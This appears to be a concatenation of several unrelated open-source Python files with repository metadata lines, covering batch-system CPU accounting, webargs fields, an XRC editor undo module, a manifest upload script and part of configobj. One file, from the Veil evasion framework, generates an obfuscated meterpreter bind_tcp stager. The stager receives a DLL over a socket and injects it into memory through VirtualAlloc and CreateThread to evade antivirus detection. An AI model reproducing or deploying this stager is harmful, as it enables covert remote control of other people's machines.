cmd = "qstat -f -j %s" % (self.jobID)
result = runCommand(cmd)
if not result["OK"]:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage.*cpu.*", line):
match = re.search(r"cpu=([\d,:]*),", line)
if match:
cpuList = match.groups()[0].split(":")
try:
newcpu = 0.0
if len(cpuList) == 3:
newcpu = float(cpuList[0]) * 3600 + float(cpuList[1]) * 60 + float(cpuList[2])
elif len(cpuList) == 4:
newcpu = (
float(cpuList[0]) * 24 * 3600
+ float(cpuList[1]) * 3600
+ float(cpuList[2]) * 60
+ float(cpuList[3])
)
if not cpu or newcpu > cpu:
cpu = newcpu
except ValueError:
self.log.warn('Problem parsing "%s" for CPU consumed' % line)
if re.search("hard resource_list.*cpu.*", line):
match = re.search(r"_cpu=(\d*)", line)
if match:
cpuLimit = float(match.groups()[0])
match = re.search(r"_rt=(\d*)", line)
if match:
wallClockLimit = float(match.groups()[0])
else:
self.log.warn("No hard limits found")
# Some SGE batch systems apply CPU scaling factor to the CPU consumption figures
if cpu:
factor = _getCPUScalingFactor()
if factor:
cpu = cpu / factor
consumed = {"CPU": cpu, "CPULimit": cpuLimit, "WallClock": wallClock, "WallClockLimit": wallClockLimit}
if None in consumed.values():
missed = [key for key, val in consumed.items() if val is None]
msg = "Could not determine parameter"
self.log.warn("Could not determine parameter", ",".join(missed))
self.log.debug("This is the stdout from the batch system call\n%s" % (result["Value"]))
else:
self.log.debug("TimeLeft counters complete:", str(consumed))
if cpuLimit or wallClockLimit:
# We have got a partial result from SGE
if not cpuLimit:
# Take some margin
consumed["CPULimit"] = wallClockLimit * 0.8
if not wallClockLimit:
consumed["WallClockLimit"] = cpuLimit / 0.8
if not cpu:
consumed["CPU"] = time.time() - self.startTime
if not wallClock:
consumed["WallClock"] = time.time() - self.startTime
self.log.debug("TimeLeft counters restored:", str(consumed))
return S_OK(consumed)
else:
msg = "Could not determine necessary parameters"
self.log.info(msg, ":\nThis is the stdout from the batch system call\n%s" % (result["Value"]))
retVal = S_ERROR(msg)
retVal["Value"] = consumed
return retVal
def _getCPUScalingFactor():
host = socket.getfqdn()
cmd = "qconf -se %s" % host
result = runCommand(cmd)
if not result["OK"]:
return None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage_scaling", line):
match = re.search(r"cpu=([\d,\.]*),", line)
if match:
return float(match.groups()[0])
return None
| ic-hep/DIRAC | src/DIRAC/Resources/Computing/BatchSystems/TimeLeft/SGEResourceUsage.py | Python | gpl-3.0 | 4,887 | 0.001432 |
# -*- coding: utf-8 -*-
"""Field classes.
Includes all fields from `marshmallow.fields` in addition to a custom
`Nested` field and `DelimitedList`.
All fields can optionally take a special `location` keyword argument, which tells webargs
where to parse the request argument from. ::
args = {
'active': fields.Bool(location='query')
'content_type': fields.Str(load_from='Content-Type',
location='headers')
}
"""
import marshmallow as ma
from webargs.core import argmap2schema
__all__ = [
'Nested',
'DelimitedList',
]
# Expose all fields from marshmallow.fields.
# We do this instead of 'from marshmallow.fields import *' because webargs
# has its own subclass of Nested
for each in (field_name for field_name in ma.fields.__all__ if field_name != 'Nested'):
__all__.append(each)
globals()[each] = getattr(ma.fields, each)
class Nested(ma.fields.Nested):
"""Same as `marshmallow.fields.Nested`, except can be passed a dictionary as
the first argument, which will be converted to a `marshmallow.Schema`.
"""
def __init__(self, nested, *args, **kwargs):
if isinstance(nested, dict):
nested = argmap2schema(nested)
super(Nested, self).__init__(nested, *args, **kwargs)
class DelimitedList(ma.fields.List):
"""Same as `marshmallow.fields.List`, except can load from either a list or
a delimited string (e.g. "foo,bar,baz").
:param Field cls_or_instance: A field class or instance.
:param str delimiter: Delimiter between values.
:param bool as_string: Dump values to string.
"""
delimiter = ','
def __init__(self, cls_or_instance, delimiter=None, as_string=False, **kwargs):
self.delimiter = delimiter or self.delimiter
self.as_string = as_string
super(DelimitedList, self).__init__(cls_or_instance, **kwargs)
def _serialize(self, value, attr, obj):
ret = super(DelimitedList, self)._serialize(value, attr, obj)
if self.as_string:
return self.delimiter.join(format(each) for each in value)
return ret
def _deserialize(self, value, attr, data):
try:
ret = (
value
if ma.utils.is_iterable_but_not_string(value)
else value.split(self.delimiter)
)
except AttributeError:
self.fail('invalid')
return super(DelimitedList, self)._deserialize(ret, attr, data)
| daspots/dasapp | lib/webargs/fields.py | Python | mit | 2,488 | 0.00201 |
# Name: undo.py
# Purpose: XRC editor, undo/redo module
# Author: Roman Rolinsky <[email protected]>
# Created: 01.12.2002
# RCS-ID: $Id: undo.py 54812 2008-07-29 13:39:00Z ROL $
from globals import *
import view
from component import Manager
from model import Model
undo_depth = 10 # max number of undo remembered
# Undo/redo classes
class UndoManager:
# Undo/redo stacks
undo = []
redo = []
def RegisterUndo(self, undoObj):
TRACE('RegisterUndo: %s', undoObj.label)
self.undo.append(undoObj)
while len(self.undo) > undo_depth: self.undo.pop(0)
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def GetUndoLabel(self):
return self.undo[-1].label
def GetRedoLabel(self):
return self.redo[-1].label
def Undo(self):
undoObj = self.undo.pop()
undoObj.undo()
self.redo.append(undoObj)
view.frame.SetStatusText('Undone')
Presenter.setModified()
self.UpdateToolHelp()
def Redo(self):
undoObj = self.redo.pop()
undoObj.redo()
self.undo.append(undoObj)
view.frame.SetStatusText('Redone')
Presenter.setModified()
self.UpdateToolHelp()
def Clear(self):
map(Undo.destroy, self.undo)
self.undo = []
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def CanUndo(self):
return bool(self.undo)
def CanRedo(self):
return bool(self.redo)
def UpdateToolHelp(self):
if g.undoMan.CanUndo():
msg = 'Undo ' + self.GetUndoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_UNDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_UNDO, msg)
if g.undoMan.CanRedo():
msg = 'Redo ' + self.GetRedoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_REDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_REDO, msg)
class Undo:
'''ABC for Undo*.'''
def redo(self): # usually redo is same as undo
self.undo()
def destroy(self):
pass
class UndoCutDelete(Undo):
label = 'cut/delete'
def __init__(self, itemIndex, state, node):
self.itemIndex = itemIndex
self.state = state
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
Presenter.unselect()
# Updating DOM. Find parent node first
parentItem = view.tree.ItemAtFullIndex(self.itemIndex[:-1])
parentNode = view.tree.GetPyData(parentItem)
parentComp = Manager.getNodeComp(parentNode)
nextItem = view.tree.ItemAtFullIndex(self.itemIndex)
if nextItem:
nextNode = parentComp.getTreeOrImplicitNode(view.tree.GetPyData(nextItem))
else:
nextNode = None
# Insert before next
parentNode.insertBefore(self.node, nextNode)
# Remember test window item
if view.testWin.item is not None:
testItemIndex = view.tree.ItemFullIndex(view.testWin.item)
# Update tree and presenter
view.tree.FlushSubtree(parentItem, parentNode)
view.tree.SetFullState(self.state)
# Restore test window item
if view.testWin.item is not None:
view.testWin.item = view.tree.ItemAtFullIndex(testItemIndex)
item = view.tree.ItemAtFullIndex(self.itemIndex)
view.tree.EnsureVisible(item)
# This will generate events
view.tree.SelectItem(item)
def redo(self):
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
self.node = Presenter.delete(item)
# Undoing paste/create is the opposite of cut/delete, so we can reuse
# UndoCutDelete class swapping undo<->redo
class UndoPasteCreate(UndoCutDelete):
label = 'paste/create'
# The ctor is different because node is not known initially
def __init__(self, itemIndex, state):
self.itemIndex = itemIndex # new item index
self.state = state # tree state
self.node = None
undo = UndoCutDelete.redo
redo = UndoCutDelete.undo
class UndoReplace(Undo):
label = 'replace'
def __init__(self, itemIndex, comp, node):
self.itemIndex = itemIndex
self.comp = comp
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
# Replace current node with old node
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
comp = self.comp
node = self.node
data = wx.TreeItemData(node)
parentItem = view.tree.GetItemParent(item)
parentNode = view.tree.GetPyData(parentItem)
self.node = view.tree.GetPyData(item)
self.comp = Presenter.comp
Presenter.container.replaceChild(parentNode, node, self.node)
# Replace tree item: insert new, remove old
label = comp.getTreeText(node)
imageId = comp.getTreeImageId(node)
item = view.tree.InsertItem(parentItem, item, label, imageId, data=data)
view.tree.Delete(view.tree.GetPrevSibling(item))
Presenter.item = item
# Add children
for n in filter(is_object, node.childNodes):
view.tree.AddNode(item, comp.getTreeNode(n))
view.tree.EnsureVisible(item)
# Update panel
view.tree.SelectItem(item)
Presenter.setModified()
class UndoEdit(Undo):
'''Undo class for using in AttributePanel.'''
label = 'edit'
def __init__(self, item, page):
self.index = view.tree.ItemFullIndex(item)
self.page = page
panel = view.panel.nb.GetPage(page).panel
self.values = panel.GetValues()
def undo(self):
# Go back to the previous item
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.index)
Presenter.setData(item)
panel = view.panel.nb.GetPage(self.page).panel
values = panel.GetValues()
panel.SetValues(self.values)
Presenter.update(item)
self.values = values
view.tree.SelectItem(item)
class UndoGlobal(Undo):
'''Undo class storing a copy of the complete tree. Can be used for
non-frequent operations to avoid programming special undo
classes.'''
label = 'global'
def __init__(self):
self.mainNode = Model.mainNode.cloneNode(True)
self.state = view.tree.GetFullState()
def destroy(self):
self.mainNode.unlink()
def undo(self):
# Exchange
Model.mainNode,self.mainNode = \
self.mainNode,Model.dom.replaceChild(self.mainNode, Model.mainNode)
# Replace testElem
Model.testElem = Model.mainNode.childNodes[0]
state = view.tree.GetFullState()
Presenter.flushSubtree()
view.tree.SetFullState(self.state)
self.state = state
def redo(self):
self.undo()
Presenter.unselect()
| ktan2020/legacy-automation | win/Lib/site-packages/wx-3.0-msw/wx/tools/XRCed/undo.py | Python | mit | 7,307 | 0.005748 |
"""
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| Veil-Framework/Veil | tools/evasion/payloads/python/meterpreter/bind_tcp.py | Python | gpl-3.0 | 6,026 | 0.009459 |
#!/usr/bin/env python3
import os
import sys
import re
import tempfile
from subprocess import run
from shutil import copyfile
args = sys.argv[1:]
in_dir = args[0] if len(args) == 1 else os.getcwd()
if not os.path.isabs(in_dir):
in_dir = os.path.abspath(in_dir)
if not os.path.isdir(in_dir):
print('"{}" is not a directory'.format(in_dir))
sys.exit(1)
work_dir = os.environ['WORK']
app_dir = re.sub(work_dir, '', in_dir)
if app_dir.startswith('/'):
app_dir = app_dir[1:]
app_base = os.path.split(app_dir)[0]
print('Looking in "{}"'.format(in_dir))
manifests = []
for root, _, filenames in os.walk(in_dir):
for filename in filenames:
if filename == 'MANIFEST':
manifests.append(os.path.join(root, filename))
num = len(manifests)
print('Found {} MANIFEST file{} in "{}"'.format(num, '' if num == 1 else 's', in_dir))
if num == 0:
sys.exit(1)
file_num = 0
tmp_dir = os.path.join(tempfile.mkdtemp(), app_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
for manifest in manifests:
man_dir = os.path.dirname(manifest)
print('Processing {}'.format(manifest))
for file in open(manifest):
file = file.rstrip()
path = re.sub('^\.', man_dir, file)
file_num += 1
print('{:3}: {}'.format(file_num, path))
if os.path.isfile(path):
filedir = os.path.dirname(re.sub(in_dir, '', path))
if filedir.startswith('/'):
filedir = filedir[1:]
partial = os.path.join(tmp_dir, filedir)
if not os.path.isdir(partial):
os.makedirs(partial)
copyfile(path, os.path.join(partial, os.path.basename(file)))
dest = 'kyclark/applications/' + app_base
upload = '/home1/03137/kyclark/cyverse-cli/bin/files-upload'
run([upload, '-F', tmp_dir, dest])
print('Done, check "{}"'.format(dest))
| kyclark/misc | tacc_manifest_upload/copy_from_manifest.py | Python | mit | 1,866 | 0.001608 |
# configobj.py
# A config file reader/writer that supports nested sections in config files.
# Copyright (C) 2005-2014:
# (name) : (email)
# Michael Foord: fuzzyman AT voidspace DOT org DOT uk
# Nicola Larosa: nico AT tekNico DOT net
# Rob Dennis: rdennis AT gmail DOT com
# Eli Courtwright: eli AT courtwright DOT org
# This software is licensed under the terms of the BSD license.
# http://opensource.org/licenses/BSD-3-Clause
# ConfigObj 5 - main repository for documentation and issue tracking:
# https://github.com/DiffSK/configobj
import os
import re
import sys
from codecs import BOM_UTF8, BOM_UTF16, BOM_UTF16_BE, BOM_UTF16_LE
from lib.six import six
from _version import __version__
# imported lazily to avoid startup performance hit if it isn't used
compiler = None
# A dictionary mapping BOM to
# the encoding to decode with, and what to set the
# encoding attribute to.
BOMS = {
BOM_UTF8: ('utf_8', None),
BOM_UTF16_BE: ('utf16_be', 'utf_16'),
BOM_UTF16_LE: ('utf16_le', 'utf_16'),
BOM_UTF16: ('utf_16', 'utf_16'),
}
# All legal variants of the BOM codecs.
# TODO: the list of aliases is not meant to be exhaustive, is there a
# better way ?
BOM_LIST = {
'utf_16': 'utf_16',
'u16': 'utf_16',
'utf16': 'utf_16',
'utf-16': 'utf_16',
'utf16_be': 'utf16_be',
'utf_16_be': 'utf16_be',
'utf-16be': 'utf16_be',
'utf16_le': 'utf16_le',
'utf_16_le': 'utf16_le',
'utf-16le': 'utf16_le',
'utf_8': 'utf_8',
'u8': 'utf_8',
'utf': 'utf_8',
'utf8': 'utf_8',
'utf-8': 'utf_8',
}
# Map of encodings to the BOM to write.
BOM_SET = {
'utf_8': BOM_UTF8,
'utf_16': BOM_UTF16,
'utf16_be': BOM_UTF16_BE,
'utf16_le': BOM_UTF16_LE,
None: BOM_UTF8
}
def match_utf8(encoding):
return BOM_LIST.get(encoding.lower()) == 'utf_8'
# Quote strings used for writing values
squot = "'%s'"
dquot = '"%s"'
noquot = "%s"
wspace_plus = ' \r\n\v\t\'"'
tsquot = '"""%s"""'
tdquot = "'''%s'''"
# Sentinel for use in getattr calls to replace hasattr
MISSING = object()
__all__ = (
'DEFAULT_INDENT_TYPE',
'DEFAULT_INTERPOLATION',
'ConfigObjError',
'NestingError',
'ParseError',
'DuplicateError',
'ConfigspecError',
'ConfigObj',
'SimpleVal',
'InterpolationError',
'InterpolationLoopError',
'MissingInterpolationOption',
'RepeatSectionError',
'ReloadError',
'UnreprError',
'UnknownType',
'flatten_errors',
'get_extra_values'
)
DEFAULT_INTERPOLATION = 'configparser'
DEFAULT_INDENT_TYPE = ' '
MAX_INTERPOL_DEPTH = 10
OPTION_DEFAULTS = {
'interpolation': True,
'raise_errors': False,
'list_values': True,
'create_empty': False,
'file_error': False,
'configspec': None,
'stringify': True,
# option may be set to one of ('', ' ', '\t')
'indent_type': None,
'encoding': None,
'default_encoding': None,
'unrepr': False,
'write_empty_values': False,
}
# this could be replaced if six is used for compatibility, or there are no
# more assertions about items being a string
def getObj(s):
global compiler
if compiler is None:
import compiler
s = "a=" + s
p = compiler.parse(s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
class UnknownType(Exception):
pass
class Builder(object):
def build(self, o):
if m is None:
raise UnknownType(o.__class__.__name__)
return m(o)
def build_List(self, o):
return list(map(self.build, o.getChildren()))
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = next(i)
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
if o.name == 'None':
return None
if o.name == 'True':
return True
if o.name == 'False':
return False
# An undefined Name
raise UnknownType('Undefined Name')
def build_Add(self, o):
real, imag = list(map(self.build_Const, o.getChildren()))
try:
real = float(real)
except TypeError:
raise UnknownType('Add')
if not isinstance(imag, complex) or imag.real != 0.0:
raise UnknownType('Add')
return real+imag
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_UnarySub(self, o):
return -self.build_Const(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build_Const(o.getChildren()[0])
_builder = Builder()
def unrepr(s):
if not s:
return s
# this is supposed to be safe
import ast
return ast.literal_eval(s)
class ConfigObjError(SyntaxError):
"""
This is the base class for all errors that ConfigObj raises.
It is a subclass of SyntaxError.
"""
def __init__(self, message='', line_number=None, line=''):
self.line = line
self.line_number = line_number
SyntaxError.__init__(self, message)
class NestingError(ConfigObjError):
"""
This error indicates a level of nesting that doesn't match.
"""
class ParseError(ConfigObjError):
"""
This error indicates that a line is badly written.
It is neither a valid ``key = value`` line,
nor a valid section marker line.
"""
class ReloadError(IOError):
"""
A 'reload' operation failed.
This exception is a subclass of ``IOError``.
"""
def __init__(self):
IOError.__init__(self, 'reload failed, filename is not set.')
class DuplicateError(ConfigObjError):
"""
The keyword or section specified already exists.
"""
class ConfigspecError(ConfigObjError):
"""
An error occured whilst parsing a configspec.
"""
class InterpolationError(ConfigObjError):
"""Base class for the two interpolation errors."""
class InterpolationLoopError(InterpolationError):
"""Maximum interpolation depth exceeded in string interpolation."""
def __init__(self, option):
InterpolationError.__init__(
self,
'interpolation loop detected in value "%s".' % option)
class RepeatSectionError(ConfigObjError):
"""
This error indicates additional sections in a section with a
``__many__`` (repeated) section.
"""
class MissingInterpolationOption(InterpolationError):
"""A value specified for interpolation was missing."""
def __init__(self, option):
msg = 'missing option "%s" in interpolation.' % option
InterpolationError.__init__(self, msg)
class UnreprError(ConfigObjError):
"""An error parsing in unrepr mode."""
class InterpolationEngine(object):
"""
A helper class to help perform string interpolation.
This class is an abstract base class; its descendants perform
the actual work.
"""
# compiled regexp to use in self.interpolate()
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
_cookie = '%'
def __init__(self, section):
# the Section instance that "owns" this engine
self.section = section
def interpolate(self, key, value):
# short-cut
if not self._cookie in value:
return value
def recursive_interpolate(key, value, section, backtrail):
"""The function that does the actual work.
``value``: the string we're trying to interpolate.
``section``: the section in which that string was found
``backtrail``: a dict to keep track of where we've been,
to detect and prevent infinite recursion loops
This is similar to a depth-first-search algorithm.
"""
# Have we been here already?
if (key, section.name) in backtrail:
# Yes - infinite loop detected
raise InterpolationLoopError(key)
# Place a marker on our backtrail so we won't come back here again
backtrail[(key, section.name)] = 1
# Now start the actual work
match = self._KEYCRE.search(value)
while match:
# The actual parsing of the match is implementation-dependent,
# so delegate to our helper function
k, v, s = self._parse_match(match)
if k is None:
# That's the signal that no further interpolation is needed
replacement = v
else:
# Further interpolation may be needed to obtain final value
replacement = recursive_interpolate(k, v, s, backtrail)
# Replace the matched string with its final value
start, end = match.span()
value = ''.join((value[:start], replacement, value[end:]))
new_search_start = start + len(replacement)
# Pick up the next interpolation key, if any, for next time
# through the while loop
match = self._KEYCRE.search(value, new_search_start)
# Now safe to come back here again; remove marker from backtrail
del backtrail[(key, section.name)]
return value
# Back in interpolate(), all we have to do is kick off the recursive
# function with appropriate starting values
value = recursive_interpolate(key, value, self.section, {})
return value
def _fetch(self, key):
"""Helper function to fetch values from owning section.
Returns a 2-tuple: the value, and the section where it was found.
"""
# switch off interpolation before we try and fetch anything !
save_interp = self.section.main.interpolation
self.section.main.interpolation = False
# Start at section that "owns" this InterpolationEngine
current_section = self.section
while True:
# try the current section first
val = current_section.get(key)
if val is not None and not isinstance(val, Section):
break
# try "DEFAULT" next
val = current_section.get('DEFAULT', {}).get(key)
if val is not None and not isinstance(val, Section):
break
# move up to parent and try again
# top-level's parent is itself
if current_section.parent is current_section:
# reached top level, time to give up
break
current_section = current_section.parent
# restore interpolation to previous value before returning
self.section.main.interpolation = save_interp
if val is None:
raise MissingInterpolationOption(key)
return val, current_section
def _parse_match(self, match):
"""Implementation-dependent helper function.
Will be passed a match object corresponding to the interpolation
key we just found (e.g., "%(foo)s" or "$foo"). Should look up that
key in the appropriate config file section (using the ``_fetch()``
helper function) and return a 3-tuple: (key, value, section)
``key`` is the name of the key we're looking for
``value`` is the value found for that key
``section`` is a reference to the section where it was found
``key`` and ``section`` should be None if no further
interpolation should be performed on the resulting value
(e.g., if we interpolated "$$" and returned "$").
"""
raise NotImplementedError()
class ConfigParserInterpolation(InterpolationEngine):
"""Behaves like ConfigParser."""
_cookie = '%'
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
def _parse_match(self, match):
key = match.group(1)
value, section = self._fetch(key)
return key, value, section
class TemplateInterpolation(InterpolationEngine):
"""Behaves like string.Template."""
_cookie = '$'
_delimiter = '$'
_KEYCRE = re.compile(r"""
\$(?:
(?P<escaped>\$) | # Two $ signs
(?P<named>[_a-z][_a-z0-9]*) | # $name format
{(?P<braced>[^}]*)} # ${name} format
)
""", re.IGNORECASE | re.VERBOSE)
def _parse_match(self, match):
# Valid name (in or out of braces): fetch value from section
key = match.group('named') or match.group('braced')
if key is not None:
value, section = self._fetch(key)
return key, value, section
# Escaped delimiter (e.g., $$): return single delimiter
if match.group('escaped') is not None:
# Return None for key and section to indicate it's time to stop
return None, self._delimiter, None
# Anything else: ignore completely, just return it unchanged
return None, match.group(), None
interpolation_engines = {
'configparser': ConfigParserInterpolation,
'template': TemplateInterpolation,
}
def __newobj__(cls, *args):
# Hack for pickle
return cls.__new__(cls, *args)
class Section(dict):
"""
A dictionary-like object that represents a section in a config file.
It does string interpolation if the 'interpolation' attribute
of the 'main' object is set to True.
Interpolation is tried first from this object, then from the 'DEFAULT'
section of this object, next from the parent and its 'DEFAULT' section,
and so on until the main object is reached.
A Section will behave like an ordered dictionary - following the
order of the ``scalars`` and ``sections`` attributes.
You can use this to change the order of members.
Iteration follows the order: scalars, then sections.
"""
def __setstate__(self, state):
dict.update(self, state[0])
self.__dict__.update(state[1])
def __reduce__(self):
state = (dict(self), self.__dict__)
return (__newobj__, (self.__class__,), state)
def __init__(self, parent, depth, main, indict=None, name=None):
"""
* parent is the section above
* depth is the depth level of this section
* main is the main ConfigObj
* indict is a dictionary to initialise the section with
"""
if indict is None:
indict = {}
dict.__init__(self)
# used for nesting level *and* interpolation
self.parent = parent
# used for the interpolation attribute
self.main = main
# level of nesting depth of this Section
self.depth = depth
# purely for information
self.name = name
#
self._initialise()
# we do this explicitly so that __setitem__ is used properly
# (rather than just passing to ``dict.__init__``)
for entry, value in indict.items():
self[entry] = value
def _initialise(self):
# the sequence of scalar values in this Section
self.scalars = []
# the sequence of sections in this Section
self.sections = []
# for comments :-)
self.comments = {}
self.inline_comments = {}
# the configspec
self.configspec = None
# for defaults
self.defaults = []
self.default_values = {}
self.extra_values = []
self._created = False
def _interpolate(self, key, value):
try:
# do we already have an interpolation engine?
engine = self._interpolation_engine
except AttributeError:
# not yet: first time running _interpolate(), so pick the engine
name = self.main.interpolation
if name == True: # note that "if name:" would be incorrect here
# backwards-compatibility: interpolation=True means use default
name = DEFAULT_INTERPOLATION
name = name.lower() # so that "Template", "template", etc. all work
class_ = interpolation_engines.get(name, None)
if class_ is None:
# invalid value for self.main.interpolation
self.main.interpolation = False
return value
else:
# save reference to engine so we don't have to do this again
engine = self._interpolation_engine = class_(self)
# let the engine do the actual work
return engine.interpolate(key, value)
def __getitem__(self, key):
"""Fetch the item and do string interpolation."""
val = dict.__getitem__(self, key)
if self.main.interpolation:
if isinstance(val, six.string_types):
return self._interpolate(key, val)
if isinstance(val, list):
def _check(entry):
if isinstance(entry, six.string_types):
return self._interpolate(key, entry)
return entry
new = [_check(entry) for entry in val]
if new != val:
return new
return val
def __setitem__(self, key, value, unrepr=False):
"""
Correctly set a value.
Making dictionary values Section instances.
(We have to special case 'Section' instances - which are also dicts)
Keys must be strings.
Values need only be strings (or lists of strings) if
``main.stringify`` is set.
``unrepr`` must be set when setting a value to a dictionary, without
creating a new sub-section.
"""
if not isinstance(key, six.string_types):
raise ValueError('The key "%s" is not a string.' % key)
# add the comment
if key not in self.comments:
self.comments[key] = []
self.inline_comments[key] = ''
# remove the entry from defaults
if key in self.defaults:
self.defaults.remove(key)
#
if isinstance(value, Section):
if key not in self:
self.sections.append(key)
dict.__setitem__(self, key, value)
elif isinstance(value, dict) and not unrepr:
# First create the new depth level,
# then create the section
if key not in self:
self.sections.append(key)
new_depth = self.depth + 1
dict.__setitem__(
self,
key,
Section(
self,
new_depth,
self.main,
indict=value,
name=key))
else:
if key not in self:
self.scalars.append(key)
if not self.main.stringify:
if isinstance(value, six.string_types):
pass
elif isinstance(value, (list, tuple)):
for entry in value:
if not isinstance(entry, six.string_types):
raise TypeError('Value is not a string "%s".' % entry)
else:
raise TypeError('Value is not a string "%s".' % value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
"""Remove items from the sequence when deleting."""
dict. __delitem__(self, key)
if key in self.scalars:
self.scalars.remove(key)
else:
self.sections.remove(key)
del self.comments[key]
del self.inline_comments[key]
def get(self, key, default=None):
"""A version of ``get`` that doesn't bypass string interpolation."""
try:
return self[key]
except KeyError:
return default
def update(self, indict):
"""
A version of update that uses our ``__setitem__``.
"""
for entry in indict:
self[entry] = indict[entry]
def pop(self, key, default=MISSING):
"""
'D.pop(k[,d]) -> v, remove specified key and return the corresponding value.
